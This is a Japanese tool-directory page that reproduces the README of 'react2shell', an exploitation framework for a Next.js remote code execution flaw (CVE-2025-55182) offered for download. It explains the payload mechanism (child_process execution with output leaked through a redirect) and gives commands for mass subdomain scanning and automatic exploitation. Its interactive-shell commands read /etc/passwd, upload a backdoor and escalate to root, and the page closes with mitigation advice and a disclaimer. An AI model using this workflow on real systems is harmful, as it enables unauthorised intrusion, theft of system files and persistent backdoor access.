Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
react2shell-cve-2025-55182 — CVE-2025-55182(Next.js RCE)向けの自動化エクスプロイトフレームワーク。サブドメイン列挙、脆弱性スキャン、ペイロード生成、対話型リモートシェルとファイル操作を備えています。 | Kitploit
ツール/GitHubGitHub/opsecramdan/react2shell-cve-2025-55182
特権昇格偵察脆弱性スキャナーペイロード生成エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールサブドメイン列挙

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リモートアクセスツール
GitHubopsecramdan/react2shell-cve-2025-55182

react2shell-cve-2025-55182

CVE-2025-55182(Next.js RCE)向けの自動化エクスプロイトフレームワーク。サブドメイン列挙、脆弱性スキャン、ペイロード生成、対話型リモートシェルとファイル操作を備えています。

リポジトリを見る
4ヶ月前未レビュー

🚨 React2Shell - CVE-2025-55182 悪用フレームワーク

Severity Type Platform Python

CVE-2025-55182(Next.js リモートコード実行)の高度な悪用フレームワーク

作者: opsecramdan


📚 目次

  • 概要
  • 脆弱性の詳細
  • 機能
  • 要件
  • インストール
  • 使用方法
  • インタラクティブシェル
  • 出力ファイル
  • 影響
  • 緩和策
  • 制限事項
  • 免責事項

📌 概要

React2Shell は、Next.js ベースのアプリケーションにおける CVE-2025-55182 の脆弱性を特定・悪用するためのエクスプロイテーションフレームワークです。

このツールは、以下の機能を備えた オールインワンの攻撃用ツールキット として設計されています:

  • サブドメイン列挙
  • 脆弱性スキャン
  • エクスプロイトエンジン
  • インタラクティブリモートシェル

🔍 脆弱性の詳細

  • CVE ID: CVE-2025-55182
  • タイプ: リモートコード実行(RCE)
  • プラットフォーム: Next.js
  • 攻撃ベクトル: 悪意のある multipart/form-data リクエスト
  • 影響: 任意のコマンド実行

🧠 根本原因

この脆弱性は、Next.js の内部メカニズムを以下の方法で悪用します:

  1. リクエストにペイロードを注入
  2. 呼び出し: process.mainModule.require('child_process')
  3. OS コマンドを実行
  4. 出力を Base64 でエンコード
  5. リダイレクト(/login?a=)を通じて結果を漏洩

⚙️ 機能

🔎 サブドメイン列挙

  • DNS + HTTP スキャン
  • 組み込みワードリスト
  • カスタムワードリストのサポート
  • 結果の自動保存

🧪 脆弱性スキャナー

  • マルチエンドポイントテスト:
  • /
  • /api
  • /api/auth
  • /_next
  • /admin
  • /dashboard
  • ヘッダーとレスポンスの分析
  • 誤検出の低減

💣 エクスプロイトエンジン

  • 自動ペイロード生成
  • Base64 エンコードされた実行
  • リダイレクトベースの出力抽出

🖥️ インタラクティブシェル

  • リモートコマンド実行
  • 永続セッション
  • ディレクトリ追跡

📂 ファイル操作

  • ファイルのアップロード
  • ファイルのダウンロード
  • ファイルの作成

👑 ルートモード

  • sudo -i 実行
  • 権限昇格シミュレーション

📦 要件

  • Python 3.x

依存関係のインストール: pip install requests dnspython


📥 インストール

1. リポジトリのクローン

git clone https://github.com/yourusername/react2shell-cve-2025-55182.git

2. ディレクトリに移動

cd react2shell-cve-2025-55182

3. ツールを実行

python3 react2shell.py


🚀 使用方法

🎯 単一ターゲット

python3 react2shell.py -u https://target.com

プロトコルなし:

python3 react2shell.py -u target.com


📄 複数ターゲット

python3 react2shell.py -f targets.txt

targets.txt の内容例:

https://target1.com http://target2.com:3000 target3.com


🌐 フルモード(偵察 + スキャン + エクスプロイト)

python3 react2shell.py -d example.com

フロー:

  1. サブドメイン列挙
  2. 脆弱性スキャン
  3. エクスプロイト(オプション)

📚 カスタムワードリスト

python3 react2shell.py -d example.com -w wordlist.txt


🐞 デバッグモード

python3 react2shell.py -d example.com --debug


🖥️ インタラクティブシェル

エクスプロイトが成功すると、シェルにアクセスできます。

基本コマンド

whoami
id
uname -a
pwd
ls -lah


⚙️ 特殊コマンド


📂 ファイルのアップロード

.upload shell.php /tmp/shell.php


📥 ファイルのダウンロード

.download /etc/passwd


📄 ファイルの作成

.create /tmp/test.txt


🔄 ワークフロー例

1. ドメインをスキャン

python3 react2shell.py -d example.com

2. 脆弱なターゲットを特定

3. シェルに入る

whoami

4. ペイロードをアップロード

.upload backdoor.sh /tmp/backdoor.sh


📁 出力ファイル

ツールは以下を生成します:

  • subdomains_*.txt
  • vulnerable_*.txt
  • output_*.txt

⚠️ 影響

エクスプロイトに成功した場合:

  • リモートコマンド実行
  • 機密ファイルへのアクセス
  • バックドアのアップロード
  • 永続的なアクセス
  • 権限昇格

🛡️ 緩和策

  • Next.js を最新バージョンに更新
  • 内部エンドポイントを制限
  • 入力を厳密に検証
  • WAF(OWASP CRS)を使用
  • 異常なアクティビティを監視

⚠️ 免責事項

このツールは以下の目的のみで作成されています:

  • 学習
  • 研究
  • 許可されたペネトレーションテスト

不正な活動に使用することは禁止されています。


⭐ 備考

このプロジェクトは以下を示しています:

  • 高度なエクスプロイト技術
  • Next.js 内部の理解
  • 現実世界の攻撃シミュレーション
ツールをダウンロード
コマンド説明
.rootルートモードの切り替え
.uploadターゲットにファイルをアップロード
.downloadターゲットからファイルをダウンロード
.createターゲット上にファイルを作成
.save出力をローカルファイルに保存
.exitシェルを終了